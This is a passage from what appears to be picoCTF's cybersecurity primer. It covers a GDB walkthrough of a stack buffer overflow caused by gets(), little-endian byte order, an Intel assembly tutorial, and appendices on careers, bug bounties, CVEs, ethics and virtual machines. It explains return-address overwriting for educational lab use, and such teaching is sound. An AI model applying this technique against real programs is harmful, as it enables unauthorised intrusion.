**⇒** 0x4005ce <+4>: 48 83 c4 80 add $0xffffffffffffff80,%rsp do you see the arrow "⇒" at the left? That indicates the instruction in which we are. Next to it there is an address, that as expected, has the same value as the Instruction Pointer. Then there is the <+4> which we already explained, followed by the machine code "48 83 c4 80" at the address 0x4005ce… Hold on, what is going on? A few paragraphs ago we said that the machine code at that address was " 0x 80 c4 83 48" when we printed the Instruction Pointer using "x $rip". But now we say it is "48 83 c4 80". If you look closely, these are the same bytes but backwards. Let’s take advantage of this opportunity to explain "little endian". ##### 19.2.1.3 Little endian In most of the computers we use in everyday life, the numbers are interpreted as little endian. So when you read this from memory: **48 83 c4 80** It will be interpreted and shown as this: **80 c4 83 48** This is the case only for numbers. Addresses are numbers. In an attack when you want to overwrite an address, you have to consider this and input the bytes of the address backwards so they are interpreted in the correct manner. Why do computers do this? There are some reasons and consequences. In fact there are also reasons for using "big endian" which is using the bytes without inverting them. One argument commonly given for supporting little endian, is that some operations are easier to do. For instance, if you have a number, let’s say 255 in decimal, it would be 0xff in hexadecimal. If the number is contained in a variable type that takes 4 bytes, for example an "int" in C, it would look like this in memory: ff 00 00 00 Then, you want to cast it to a type that only takes two bytes, for example a "short" in C. In memory, you can leave the same value without having to move anything, and the "short" would look like this: ff 00 Now, imagine that we were not using little endian. The type "int" would hold the number like this: 00 00 00 ff And the "short" like this: 00 ff Note that we had to move the ff, which originally was on the fourth byte, and now it is in the second byte. In summary, what you should remember for binary exploits, is that if you want to write a number into memory, you have to write its bytes backwards. Also, remember that this is only for numbers. In a hypothetical situation if you want to place in memory the string "HELLO", you can put it in its original order. In GDB is possible to show a chunk of memory at a specific location using a command such as "x/16xw 0x4005da". This will print 16 words after the address 0x4005da. A word in a 64 bit processor, has 8 bytes, so that command is going to print 64 bytes. Run the command yourself! You should see something like this: ``` (gdb) x/16xw 0x4005ce 0x4005ce <vuln+4>: 0x80c48348 0x273d8d48 0xe8000001 0xfffffec2 0x4005de <vuln+20>: 0x80458d48 0xb8c78948 0x00000000 0xfffec1e8 0x4005ee <vuln+36>: 0x458d48ff 0xc7894880 0xfffea5e8 0x058b48ff 0x4005fe <vuln+52>: 0x00200a3e 0xe8c78948 0xfffffeb6 0x55c3c990 (gdb) ``` Note that GDB prints each group of 4 bytes as a numbers. Because of little endianess, each of those groups of 4 bytes, is reversed in memory. When using the previous command, no matter what is inside the memory, everything will be printed in reverse for each group of 4 bytes. ##### Function call When a function is called, the IP moves to wherever the code of the function is located. When the function is finished, the IP moves back to the next instruction to the function call. As we mentioned previously, the address of the next instruction has to be stored somewhere so the program knows where to comeback after the function is finished. We call this address the "return address". The return address is stored in the memory segment refered as the stack. How do we know in which part of the stack? There is a register called the Stack Pointer (SP), that points to the tip of the stack. When a function is called, the stack pointer moves to make room for the return address and new local variables. When the function is finished, the Stack Pointer moves to the original position prior to the function call, making the memory addresses in which the local variables from the function were located free again. Imagine that we have a toy memory with only a few addresses. Remember that the SP is the Stack Pointer, and the Stack is a region of memory, in this case colored in yellow. Suppose that we have created no local variables or anything on the stack. The stack would look like this: Then we create a local variable, using something like: `int var=4;` After that is executed, the stack would look like in the following image, because by creating a variable we push it into the stack (in this example we are using “⇐” as a simple arrow): Note that when we push a variable into the stack, we subtract one address to the SP, so it points to the new top of the stack. In this case the new SP value will be 16, which means is pointing to the address 16. If we create another local variable like this: `int var=5;` The stack would look like this: And the SP would be equal to 15. In real life, on a 32 bit Intel architecture, each address contains four bytes. Integers are stored in little endian, and the addresses would have bigger values on a running program because the stack is placed on higher addresses. A piece of the stack that created two integer with values 5 and 4, could look like this (remember that address and memory are usually represented in hex): Let’s go now to real life on our 64 bit program. In GDB, set a breakpoint in the function "main" using "b main": `(gdb) b main` And run the program again using "r" `(gdb) r` The program being debugged has been started already. ``` Start it from the beginning? (y or n) y Starting program: /vuln1 Breakpoint 2, 0x0000000000400611 in main () (gdb) ``` To show the assembly of the current function in where we are, which is "main", use "disas": ``` (gdb) disas Dump of assembler code for function main: 0x000000000040060d <+0>: push %rbp 0x000000000040060e <+1>: mov %rsp,%rbp => 0x0000000000400611 <+4>: sub $0x10,%rsp 0x0000000000400615 <+8>: mov %edi,-0x4(%rbp) 0x0000000000400618 <+11>: mov %rsi,-0x10(%rbp) 0x000000000040061c <+15>: mov $0x0,%eax 0x0000000000400621 <+20>: callq 0x4005ca <vuln> 0x0000000000400626 <+25>: mov $0x0,%eax 0x000000000040062b <+30>: leaveq 0x000000000040062c <+31>: retq End of assembler dump. ``` Even if you don’t know assembly, if you look through it, you might guess that "callq 0x4005ca <vuln>" is the function call to "vuln". We will go to that instruction in the debugger. To advance one instruction in GDB we can use "si". Try it, and use "disas" again to see where we are now. You should see something like this: ``` (gdb) si 0x0000000000400615 in main () (gdb) disas Dump of assembler code for function main: 0x000000000040060d <+0>: push %rbp 0x000000000040060e <+1>: mov %rsp,%rbp 0x0000000000400611 <+4>: sub $0x10,%rsp => 0x0000000000400615 <+8>: mov %edi,-0x4(%rbp) 0x0000000000400618 <+11>: mov %rsi,-0x10(%rbp) 0x000000000040061c <+15>: mov $0x0,%eax 0x0000000000400621 <+20>: callq 0x4005ca <vuln> 0x0000000000400626 <+25>: mov $0x0,%eax 0x000000000040062b <+30>: leaveq 0x000000000040062c <+31>: retq End of assembler ``` We could use "si" three times more to get to the instruction in which the function call is made. But this strategy might not be good if we are far away from the function call. Instead, we can set a breakpoint on the memory address of the function call that we see is "0x0000000000400621". To set a breakpoint on a memory address, we also use "b", but we put an asterisk previous to the address like this "b *0x0000000000400621", after pressing enter you should see something like: ``` (gdb) b *0x0000000000400621 Breakpoint 3 at 0x400621 (gdb) ``` Now, use "continue" or "c" to continue to the breakpoint: ``` (gdb) c Continuing. Breakpoint 3, 0x0000000000400621 in main () (gdb) ``` Now, verify that we actually get to where we wanted using "disas": ``` (gdb) disas Dump of assembler code for function main: 0x000000000040060d <+0>: push %rbp 0x000000000040060e <+1>: mov %rsp,%rbp 0x0000000000400611 <+4>: sub $0x10,%rsp 0x0000000000400615 <+8>: mov %edi,-0x4(%rbp) 0x0000000000400618 <+11>: mov %rsi,-0x10(%rbp) 0x000000000040061c <+15>: mov $0x0,%eax => 0x0000000000400621 <+20>: callq 0x4005ca <vuln> 0x0000000000400626 <+25>: mov $0x0,%eax 0x000000000040062b <+30>: leaveq 0x000000000040062c <+31>: retq End of assembler dump. (gdb) ``` At this point, the program is about to execute the function call to "vuln()". Remember that the return address is the next instruction to the function call. Note that If it was the same as the function call, it would return and call the function again and get into an infinite loop In this case, the return address is "0x0000000000400626", remember this address. If we check the Stack Pointer (SP) right now using "x $rsp" we would see that it points to an address that does not contain the return address yet: ``` (gdb) x $rsp 0x7fffffffe010: 0xffffe108 ``` If we advance one instruction using "si", we would suddenly be in the first instruction of the function "vuln()": ``` (gdb) si 0x00000000004005ca in vuln () (gdb) disas Dump of assembler code for function vuln: => 0x00000000004005ca <+0>: push %rbp 0x00000000004005cb <+1>: mov %rsp,%rbp 0x00000000004005ce <+4>: add $0xffffffffffffff80,%rsp 0x00000000004005d2 <+8>: lea 0x127(%rip),%rdi # 0x400700 0x00000000004005d9 <+15>: callq 0x4004a0 <puts@plt> 0x00000000004005de <+20>: lea -0x80(%rbp),%rax 0x00000000004005e2 <+24>: mov %rax,%rdi 0x00000000004005e5 <+27>: mov $0x0,%eax 0x00000000004005ea <+32>: callq 0x4004b0 <gets@plt> 0x00000000004005ef <+37>: lea -0x80(%rbp),%rax 0x00000000004005f3 <+41>: mov %rax,%rdi 0x00000000004005f6 <+44>: callq 0x4004a0 <puts@plt> 0x00000000004005fb <+49>: mov 0x200a3e(%rip),%rax 0x0000000000400602 <+56>: mov %rax,%rdi 0x0000000000400605 <+59>: callq 0x4004c0 <fflush@plt> 0x000000000040060a <+64>: nop 0x000000000040060b <+65>: leaveq 0x000000000040060c <+66>: retq End of ``` And if we check the SP again: ``` (gdb) x $rsp 0x7fffffffe008: 0x00400626 (gdb) ``` Do you remember the return address was "0x0000000000400626"? We can see that the SP points to the address "0x7fffffffe008", and that address contains the return address! The whole idea of the attack, is to modify the return address, to return at another place. In our attack example at the beginning, we modify it so it returned to the function "win()". The function gets() in C, simply copies any user input and puts all that in memory, so we simply need to overwrite the return address. As a programmer, never use gets() in C, you would introduce a vulnerability in your program that is very easy to exploit! ## 12. Assembly ##### Samuel Sabogal Pardo We previously saw in binary exploitation how some registers work and how the memory of a program is allocated. Once you get some idea of how to do basic binary exploits, to enter in a more advance level it is useful to understand the assembly in more detail. There are several assembly languages and they are exclusive to the processor architecture of a computer. Processor architectures have specific instructions. For example, an Intel processor can execute different instruction than an ARM processor, hence, the assembly language for ARM is different than the one for Intel. To begin, we will be using Intel assembly just for the fact that Intel architecture is widely used. The webshell, and your computer probably, have an Intel architecture. Note that the AMD processors have the same architecture and instruction set as Intel. Smartphones, in contrast to most laptops or desktops computers, generally have an ARM processor. Intel is CISC (Complex Instruction Set Computer); that implies that it has much more instructions than ARM which is RISC (Reduced Set Instruction Computer). However, we will only be exploring some instruction in intel that are common and useful to know. It would be too dense to begin to explain instructions independently. Instead, let’s make a program and begin to understand it. Assembly is not easy to abstract at the beginning, but once you learn a few things, it becomes very intuitive and it is possible to read assembly to understand the logic of a program in an architecture you never saw before because it has similar patterns. Therefore, we encourage you to keep trying on this part even if it seems not easy to grasp at the beginning. **Outside Resource**: OpenSecurity x86-64 Training is an excellent free course on Intel assembly. ### 12.1. Registers We will show in this part, for reference, the most relevant registers from Intel Architecture for an example of a program in assembly we will introduce. The Intel registers are broken down in several categories. They include General Registers, Segment Registers, Index/Pointer Registers, and Flags registers. For now, it is good to see the purpose of each of the registers in two of those categories. ### 12.2. General Registers Note that in the General Registers, when we are using processor of 64 bits, the register name begins with R. In a 32 bits processor, the register name begins with E, and in 16-bit architecture, it does not have a prefix and the name is only two letters. For example, there is a 16-bit register called AX. In 32 bits, we have the same register for the same purpose, but it can hold 32 bits, and it is called EAX. In 64 bits, that same register is called RAX. We can use a 16-bit or 32-bit register in a 64-bit architecture, but not the other way around. Each register is conventionally used for some specific operations, but they can be used for other purposes. These are the General Registers in 16, 32, 64 bits: RAX,EAX,AX (Accumulator register): It is usually used to place the return value of a function but can be used for other purposes. RBX,EBX,BX (Base register): Used as the base pointer for memory access. We subtract or add an offset to the value of this register to access variables. RCX,ECX,CX (Counter register): Usually used as a loop counter. RDX,EDX,DX (Data register): Usually used to store temporary data in operations. Note that in a 64 bits program, the conventions can change. For example, in a 32-bit architecture we generally pass the arguments of a function in the stack, while in 64-bit programs we pass them in registers in many cases. For now, do not worry about those details. Focus on getting a sense on how assembly works when we show the example of a program in assembly. ### 12.3. Index/Pointer Registers These registers are used to mark the end or start of a region of memory to allow a program keeping track of elements such as location of variables or the top of the stack, which are essential to manipulate data in memory. RSP,ESP,SP (Stack pointer register): Indicates the top of the stack. Whenever we create a local variable, this pointer changes to allow space to that variable. For example, if we create an variable that takes 4 bytes, the stack pointer moves 4 bytes to make room for that new variable. RIP,EIP,IP (Instruction Pointer): Indicates the current instruction that the program is executing. If we make this register pointing to an address, the program will execute the code at that address. RBP,EBP,BP (Base pointer register): Indicates the beginning of the stack frame of a function. The stack frame is a region of memory in which we place data, such as local variables, from a specific function. To access a local variable from a function, we take the address of the base pointer and subtract an offset. RDI,EDI,DI (Destination index register): Generally used for copying chunks of memory, that can be strings or arrays. RSI,ESI,SI (Source index register): Similar purpose to the previous register (Destination index register). ### 12.4. Assembly example Now, let’s dive into the assembly of a program! Go to the picoCTF webshell: Compile the following program: ``` #include <stdio.h> int main( ) { int i; printf( "Enter a value :"); scanf("%d", &i); if(i>5){ printf("Greater than 5"); }else { printf("Less or equal than 5"); } return 0; } ``` To do that you can create a file with: `nano example.c` Paste the code in that file, save it with control+x, and then compile the file with: `gcc example.c -o example` Run it to verify its functionality with: ` ./example` You can obtain the assembly of a compiled program without having the original source code with the following command: `objdump --disassemble example` That will output the assembly of the compiled program ‘example’ on the terminal. You can redirect that output to a file, which in this case we call dump.txt, using: `objdump --disassemble example > dump.txt` That assembly dump has many things. For now, we will focus only on the assembly of the function ‘main’. We can dump the assembly of a specific function, in this case ‘main’, in the following manner: `gdb -batch -ex 'file example ' -ex 'disassemble main'` Also, you can run the program on GDB like this: `gdb example` Set a break point on main: ``` (gdb) b main Breakpoint 1 at 0x71e ``` And run the program: ``` (gdb) r Starting program: /home/your_user/example Breakpoint 1, 0x000055555555471e in main ()Breakpoint 1, 0x0000555555555189 in main () ``` Since the program execution stopped at main, you can do ‘disas’ to obtain the assembly from ‘main’: ``` (gdb) disas Dump of assembler code for function main: 0x000055555555471a <+0>: push %rbp 0x000055555555471b <+1>: mov %rsp,%rbp => 0x000055555555471e <+4>: sub $0x10,%rsp 0x0000555555554722 <+8>: mov %fs:0x28,%rax 0x000055555555472b <+17>: mov %rax,-0x8(%rbp) 0x000055555555472f <+21>: xor %eax,%eax 0x0000555555554731 <+23>: lea 0xfc(%rip),%rdi # 0x555555554834 0x0000555555554738 <+30>: mov $0x0,%eax 0x000055555555473d <+35>: callq 0x5555555545e0 <printf@plt> 0x0000555555554742 <+40>: lea -0xc(%rbp),%rax 0x0000555555554746 <+44>: mov %rax,%rsi 0x0000555555554749 <+47>: lea 0xf4(%rip),%rdi # 0x555555554844 0x0000555555554750 <+54>: mov $0x0,%eax 0x0000555555554755 <+59>: callq 0x5555555545f0 <__isoc99_scanf@plt> 0x000055555555475a <+64>: mov -0xc(%rbp),%eax 0x000055555555475d <+67>: cmp $0x5,%eax 0x0000555555554760 <+70>: jle 0x555555554775 <main+91> 0x0000555555554762 <+72>: lea 0xde(%rip),%rdi # 0x555555554847 0x0000555555554769 <+79>: mov $0x0,%eax 0x000055555555476e <+84>: callq 0x5555555545e0 <printf@plt> 0x0000555555554773 <+89>: jmp 0x555555554786 <main+108> 0x0000555555554775 <+91>: lea 0xda(%rip),%rdi # 0x555555554856 0x000055555555477c <+98>: mov $0x0,%eax 0x0000555555554781 <+103>: callq 0x5555555545e0 <printf@plt> 0x0000555555554786 <+108>: mov $0x0,%eax 0x000055555555478b <+113>: mov -0x8(%rbp),%rdx 0x000055555555478f <+117>: xor %fs:0x28,%rdx 0x0000555555554798 <+126>: je 0x55555555479f <main+133> 0x000055555555479a <+128>: callq 0x5555555545d0 <__stack_chk_fail@plt> 0x000055555555479f <+133>: leaveq 0x00005555555547a0 <+134>: retq End of assembler dump. ``` Note that the instructions on an Intel processor can be represented with two types of syntax. There is the AT&T syntax, which is the one we just printed, and there is the Intel syntax. Note that the syntax is different from architecture of the processor. Here we are on the same processor, which is Intel architecture, but we can use AT&T syntax or Intel syntax. To print intel syntax on GDB, we can do: `(gdb) set disassembly-flavor intel` If you run ‘disas’ again, you will see the same main function, but in Intel syntax: ``` (gdb) disas Dump of assembler code for function main: 0x000055555555471a <+0>: push rbp 0x000055555555471b <+1>: mov rbp,rsp => 0x000055555555471e <+4>: sub rsp,0x10 0x0000555555554722 <+8>: mov rax,QWORD PTR fs:0x28 0x000055555555472b <+17>: mov QWORD PTR [rbp-0x8],rax 0x000055555555472f <+21>: xor eax,eax 0x0000555555554731 <+23>: lea rdi,[rip+0xfc] # 0x555555554834 0x0000555555554738 <+30>: mov eax,0x0 0x000055555555473d <+35>: call 0x5555555545e0 <printf@plt> 0x0000555555554742 <+40>: lea rax,[rbp-0xc] 0x0000555555554746 <+44>: mov rsi,rax 0x0000555555554749 <+47>: lea rdi,[rip+0xf4] # 0x555555554844 0x0000555555554750 <+54>: mov eax,0x0 0x0000555555554755 <+59>: call 0x5555555545f0 <__isoc99_scanf@plt> 0x000055555555475a <+64>: mov eax,DWORD PTR [rbp-0xc] 0x000055555555475d <+67>: cmp eax,0x5 0x0000555555554760 <+70>: jle 0x555555554775 <main+91> 0x0000555555554762 <+72>: lea rdi,[rip+0xde] # 0x555555554847 0x0000555555554769 <+79>: mov eax,0x0 0x000055555555476e <+84>: call 0x5555555545e0 <printf@plt> 0x0000555555554773 <+89>: jmp 0x555555554786 <main+108> 0x0000555555554775 <+91>: lea rdi,[rip+0xda] # 0x555555554856 0x000055555555477c <+98>: mov eax,0x0 0x0000555555554781 <+103>: call 0x5555555545e0 <printf@plt> 0x0000555555554786 <+108>: mov eax,0x0 0x000055555555478b <+113>: mov rdx,QWORD PTR [rbp-0x8] 0x000055555555478f <+117>: xor rdx,QWORD PTR fs:0x28 0x0000555555554798 <+126>: je 0x55555555479f <main+133> 0x000055555555479a <+128>: call 0x5555555545d0 <__stack_chk_fail@plt> 0x000055555555479f <+133>: leave 0x00005555555547a0 <+134>: ret End of assembler dump. ``` In AT&T syntax, there are several differences. One of them that is notorious, is that you see the symbol % all around, which is used to prefix registers. Also, in some operations the position of arguments is different. Keep in mind this to prevent confusion. We will explain the program using Intel syntax, following each line of the assembly code. Remember from the binary exploitation section, that the hexadecimal number we observe at the left, for example this ‘0x000055555555471a <+0>:’, is the memory address in which that instruction of assembly is located on RAM. In the first line of assembly we see in the main function is the following (we removed the address shown at the left for simplicity): `push rbp` We observe the instruction ‘push rbp’. As we know already, rbp is the base pointer, which is a register used to keep track of the part of the stack in which the local variables of a function begin to be stored. In this case, the current value of the rbp is pushed into the stack, to be able to recover it later. This is an important part of a function that allow us to keep the value of the base pointer from the previous function. For example, suppose you have a function call inside another function, like in the following example in which we call func2 from func1: ``` void func2(){ char var4; char var5; char var6; } void func1(){ char var1; char var2; char var3; func2(); } ``` The piece of memory in which are stored the variables of a function is called the stack frame. In assembly we do not have variable names, instead, we have the rbp pointing to the memory address in which begins the stack frame of a function. For example, if the program is currently executing func2, the three variables declared in func2, could look like the following in memory: If we want to access the value of var6, we do rbp minus 3. Note that if we subtract three positions from rbp, we would be pointing to var6. As you can see, accessing variables in assembly is not complicated, we just need to subtract from rbp some positions to point to the variable we want. However, we just have one register in the processor to keep the value of the base pointer. So, what we do, is pushing into memory the value of the base pointer from the previous function. That is the “rbp func1” that you see in the memory from the previous image. We store the rbp from a previous function, as we store a local variable, to be able to recover it later when we come back to func1 and be able to access the variable from func1. We explained all that to point out what was this line for: `push rbp` In that line of assembly, we are storing the previous value of the rbp, to later restore it when we return from the current function. The instruction push, places the value of a registry into memory, and subtracts the size of the register to the stack pointer. In an Intel processor of 64 bits, a register is 8 bytes. So, when we do ‘push rbp’, it is automatically subtracted 8 to the stack pointer. In the second line: `0x000055555555471b <+1>: mov rbp,rsp` We assign the stack pointer value to the base pointer. Mov, in Intel syntax, assigns the value of the operand at the right side to the operand at the left side. In this case, rsp (stack pointer), is the operand at the right side, and rbp (base pointer) is the operand at the left. Such an assignment is done, because at the beginning of a function the stack pointer is pointing to the beginning of the stack frame. When push variables in a function, the stack pointer will move, because the stack pointer will be pointing always to the last variable pushed. Then, in the line: `sub rsp,0x10` We are subtracting 16 bytes from the stack pointer. Note that the prefix ‘0x’ is used to denote a hexadecimal number. 10 in hexadecimal is 16 in decimal. In Intel syntax, the instructions ‘sub’ subtracts the operand at the right side to the operand on the left side. In this case, we subtract 10 from rsp. That subtraction is done to allocate 16 bytes on the stack. We will assign values in those bytes later. So far, we have something like the following, in which we have 16 bytes allocated: Then in this line: `mov rax,QWORD PTR fs:0x28` We are assigning FS:0x28 to the register rax. QWORD PTR, means that is a pointer to a QWORD. A QWORD simply means a variable of 8 bytes. FS:0x28 contains something called the stack canary, which is a random value used to mitigate the risk of buffer overflow attacks. If that value is overwritten, the program will detect an attack or error and terminate. Then in this line: `mov QWORD PTR [rbp-0x8], rax` We are assigning the value of rax, which currently has the stack canary, to rbp-0x8. Note that rbp-0x8 is located in the memory chunk of 16 bytes we previously allocated. So, we are placing the stack canary in the first part of the stack frame of the main function. In the following image the stack canary is colored in yellow: In assembly, we cannot assign directly the contents of a memory address into other memory address. We must read the contents of the memory address into a register and then assign that register to the other memory address. That’s why rax was used. In this line: `mov eax,0x0` We are assigning 0 to the lower 32 bits of the rax register. In other words, eax are the lower 4 bytes of the rax register which is 64 bits. Then, the line: `xor eax,eax` Is used to make eax equal to zero. XOR is exclusive OR. When you XOR a variable with itself, the result is always zero. This is a property of the XOR operation. Afterwards in this line: `lea rdi,[rip+0xfc] # 0x555555554834` We are assigning to rdi the string that contains the message "Enter a value :" in our program. The instruction ‘lea’ assigns the address in the square brackets. In contrast, mov assigns the content that is located in that address. The string "Enter a value :" is located in rip+0xfc. Note that GDB gives us an indication of what is the value of rip+0xfc, as a comment at the right that shows 0x555555554834. In the current GDB session you started, run the following command to print the string at that address: `print (char*) 0x555555554834` You will see as output: `$2 = 0x555555554834 "Enter a value :"` In this line: `mov eax,0x0` We are setting eax to 0. Note that there are not square brackets, because of that, mov assigns the value at the right side directly, and not the content in the address 0. We need to set eax to zero because this is the number of floating-point arguments (FP args) that we will be passed to printf, which we are about to call. So, we are indicating we are not passing any floating-point numbers to printf. Note that we have already set eax to zero doing the XOR. Sometimes, compilers generate assembly that a human could optimize further. In this line, we finally call printf, with the string "Enter a value :" as the argument : `call 0x5555555545e0 <printf@plt>` Afterwards, we are calling scanf. Remember that in C, we called scanf like this: `scanf("%d", &i);` In assembly, the next line we are executing is this: `lea rax,[rbp-0xc]` [rbp-0xc] is the address of a local variable, remember that rbp is the base pointer. In assembly we subtract an offset to the base pointer to access the local variable we want. In [rbp-0xc] is located the variable we declared in C as ‘int i’. In other words, [rbp-0xc] is the address of ‘I’. Then we have: `mov rsi,rax` In which we assign rax to rsi. The register rsi is the source index register, which determines where the information read from the keyboard goes in scanf. Since we assign the address of ‘i’ to that register, the user input will be assigned to ‘i’. The following line calls scanf, with the arguments that are already set: `call 0x5555555545f0 <__isoc99_scanf@plt>` This line: `mov eax,DWORD PTR [rbp-0xc]` Assigns the content at [rbp-0xc], to eax. By now, [rbp-0xc], which is the spot that stores the value of the variable ‘i’ we declared on C, already has the value that the user input. So, eax currently has the value that the user input. The line: `cmp eax,0x5` compares eax to 5. The result in that comparison is placed in flags that we do not see in the source code and belong to a register called the control register. Those flags are the carry flag, sign flag, overflow flag, and zero flag. Assembly automatically uses them to represent the result of a comparison. Then, in the following line: `jle 0x555555554775` The instruction jle means Jump if Less or Equal. So, if in the result of the previous comparison eax was less than or equal than 5, the execution of the program jumps to the address 0x555555554775. You may have different addresses in your assembly if you compiled it on your own, but the instructions are the same. In the assembly from the example, at address 0x555555554775, we have the following lines ( note that we kept the addresses at the left of the instructions so you can verify the address you jumped to): ``` 0x0000555555554775 <+91>: lea rdi,[rip+0xda] # 0x555555554856 0x000055555555477c <+98>: mov eax,0x0 0x0000555555554781 <+103>: call 0x5555555545e0 <printf@plt> ``` Those lines will print the message "Less or equal than 5" in a similar manner we printed a message before. Then, the next lines after the call of printf, are: ``` 0000555555554786 <+108>: mov eax,0x0 0x000055555555478b <+113>: mov rdx,QWORD PTR [rbp-0x8] 0x000055555555478f <+117>: xor rdx,QWORD PTR fs:0x28 0x0000555555554798 <+126>: je 0x55555555479f <main+133> 0x000055555555479a <+128>: call 0x5555555545d0 <__stack_chk_fail@plt> 0x000055555555479f <+133>: leave 0x00005555555547a0 <+134>: ret ``` In the first of those lines which is: `mov eax, 0x0` We make eax zero. Then we have: `mov rdx, QWORD PTR [rbp-0x8]` That line accesses rbp-0x8, which contains the value of the stack canary. We assign that value to rdx. Then at this line: `xor rdx,QWORD PTR fs:0x28` We xor the rdx with fs:0x28. In an XOR operation, if the two elements we operate are equal, the result is zero. Then, in this line: `je 0x55555555479f <main+133>` ‘je’ means jump if equals. If the result of the XOR is zero, which would set the flags as if a comparison was equal, we jump to 0x55555555479f. What we are doing at a general level in the last lines, is taking the stack canary from our stack frame. Remember that the stack canary was previously stored there. Now we compare it with the original value of the stack canary at fs:0x28. If the value is the same, it means that the chunk of memory which was holding the stack canary in the stack frame was never overwritten. If it was never overwritten, we do a jump to skip this line: `0x000055555555479a <+128>: call 0x5555555545d0 <__stack_chk_fail@plt>` Which calls a function that indicates that the protection was violated. Note that the ‘jmp’ instruction jumps without verifying any condition. In the last two lines of the program: ``` 0x000055555555479f <+133>: leave 0x00005555555547a0 <+134>: ret ``` The instruction ‘leave’ restores the old value of the EBP that was stored in the stack. As we explained, the ebp from the previous function that called the current function is stored in the stack. Then, ‘ret’ pops the return address from the stack and redirects the execution of the program to that address. Note that a program can redirect its execution to other address by assigning that address to the rip (instruction pointer). The instruction ‘ret’ automatically pops an address from the stack and assigns it to the instruction pointer. That is the end of the ‘main’ function! Stay tuned for more content on Assembly and in the meantime checkout this great online course on the topic! ## Appendix A: Careers ##### Jeffery John With all this effort learning cyber skills, you might be wondering how to use and practice them. There are many different career paths in cybersecurity, and they all require different skills. Some of the most common careers in cybersecurity are as analysts, engineers, and penetration testers. Organizations need people who can analyze data and find patterns, people who can design and build systems, and people who can test those systems for vulnerabilities. One approach is with 'red' and 'blue' teams. Red teams are offensive, and they try to break into systems. Blue teams are defensive, and they try to protect systems from attacks. Both teams are important, and they work together to make sure that systems are secure. It’s also possible to pursue a career more independently, as a consultant or freelancer. This can be a good option for people who want to work on their own schedule and have more control over their work. The National Security Agency (NSA) also contributes to training through the RING program - Regions Investing in the Next Generation. Here’s an interactive exercise from them: https://d2hie3dpn9wvbb.cloudfront.net/NSA+Ring+Project/index.html ### A.1. Bug Bounties One way vulnerabilities are reduced is through bug bounty programs, in which organizations offer rewards to their employees or the public for finding vulnerabilities and reporting them to be fixed. This is beneficial to the organization because it allows them to find and fix vulnerabilities before they are exploited by malicious actors. Many companies have bug bounty programs, and many people are safer because of the security flaws that have been found and fixed through them. Bug bounty programs are also beneficial to hackers as they can earn money legitimately while practicing their skills and helping others be more secure. Some bug bounty programs include: - HackerOne: https://hackerone.com/bug-bounty-programs - Bugcrowd: https://www.bugcrowd.com/programs/ Even governments offer bounties! ### A.2. The CVE® Program When a vulnerability is found, it is assigned a CVE number, which is a unique identifier for that vulnerability. CVE stands for Common Vulnerabilities and Exposures, and it is a list of publicly known cybersecurity vulnerabilities. CVEs are assigned by the CVE Numbering Authority (CNA). By defining and cataloging vulnerabilities, security researchers, engineers, and analysts can more easily communicate about them to each other. Imagine trying to fix a problem without knowing what to call it! The list of CVEs, and forms to submit or update them, can be found at https://www.cve.org. ### A.3. Ethical Considerations Before publishing a vulnerability from a bug bounty program, or as a CVE, you should consider the ethical implications of doing so. If a vulnerability is published before it is fixed, it could be exploited by malicious actors. This could cause harm to people or organizations, as well as legal consequences for the publisher. Each organization or program will have its own rules and preferences for how to responsibly disclose vulnerabilities. Additionally, never hack into a system without permission, or attempt to go further than requested. This is illegal, and it could similarly cause harm to people or organizations. Bug bounty programs will define clear scopes for what is allowed. If the organization does not respond to a disclosure of a security risk to them or their users within a reasonable timeframe, there may be other options such as contacting a governing agency. In the United States, the Cybersecurity and Infrastructure Security Agency (CISA) is a good place to start: https://www.cisa.gov/coordinated-vulnerability-disclosure-process. If a malicous actor is able to find and exploit an unreported vulnerability, it is known as a 'zero-day', because the organization has had zero days to fix it. These are considered the most dangerous, and can impact millions of innocent people. Ultimately, careers in cybersecurity are all about preventing these from hapening. While this Primer cannot cover all the ethical considerations of reporting individual vulnerabilities, it is important to consider your ability to help others through responsible disclosure. ## Appendix B: Virtual Environment ##### Jeffery John We mentioned Linux in our chapter on the Shell, and you may be wondering what your next step is. The great thing about Linux is that it’s hard to outgrow! Linux is a family of open source systems, which are distributed as 'distros', and each has strengths and weaknesses. The advantage of Linux is that the user has the power to control their own device, and freely choose between distros. Most of the world’s super computers, servers, mobile devices, and embedded systems run a distro of Linux. Even the International Space Station runs Linux! When developers and hackers choose their tools, including many mentioned in this Primer, they have to consider how their hardware and software will interact. This is known as their 'environment'. ### B.1. Web Many hacking tools are web-based, and so they’ll work on any operating system that allows you to run a web browser. A good example is CrackStation which allows anyone with an internet connection to check password hashes. Another option is to use a remote server, which is a computer that you can access over the internet. Typically, you’d own or rent this server, so you’d have more control over how it’s used. This is a great way to run tools that require a lot of processing power, or to run tools that you don’t want to run on your own computer due to space or computing power limitations. Remote servers are often called and offered by 'cloud' services, and they’re a great way to get started with hacking! Note that web-based tools are often hosted on their own remote servers that they use as a 'backend' to process inputs and requests from the 'frontend', or the website that you can interact with. Having a remote server, like an instance of Amazon Web Services, Google Cloud Platform, or Azure, is unique in that you can choose the tools that are installed, the capability of the server, and how accessible to the public it is. ### B.2. Virtual Machines Virtual machines (VM) are a great way to run tools that require a specific operating system, or to run multiple operating systems at once. These can be run locally, or on a remote server. You might sometimes hear VMs referred to as a 'box' because anything inside of one tends to stay inside. You can treat a VM as if it were a separate computer - even if it’s sharing hardware locally or with your remote server! For example, if you use a Windows computer, you can run a virtual machine with a distro of Linux to run Linux tools. You can also configure your virtual machine to be created in a certain way, and then reset or share that state with others! Podman is an excellent option for this, and helps teams have effectively identical environments so collaboration is easy. Since hacking can sometimes be very dependent on the version of a target’s hardware or software, being able to practice on an exact copy is helpful. For the same reason, this is why downloading security updates for your software is a good idea! Cyber teams around the world work to 'patch' problems and publish fixes as quickly as they can. Additionally, if you’re investigating potential malware, it’s a good idea to run it in a virtual machine to help protect your computer. Since the VM acts like an independent computer, most malware will be contained inside it. If you run into any issues, you can simply reset the virtual machine to a previous state. To get started, you might be interested in VirtualBox, which alows for software virtualization to whatever your other tools or use cases need. ### B.3. VPNs When accessing a remote server, you may need a Virtual Private Network, or VPN, to connect to it. This is a way to securely connect, as well as protect your privacy. In this arrangement, your data will be encrypted and sent to the VPN provider, who will then send it to a remote server, such as a website. If a third party intercepts your data, they won’t be able to read it, and if they’re listening to your traffic, all they’ll see is the connection to the VPN, rather than where you go next. Pretty handy! In industry, companies often require their employees to use a company VPN to access their internal network from outside the office. Just like how VPNs can protect an individual’s data, they can protect a company’s sensitive information too! Without a VPN, employees working remotely may be vulnerable to their credentials being stolen. If you choose to use a VPN, 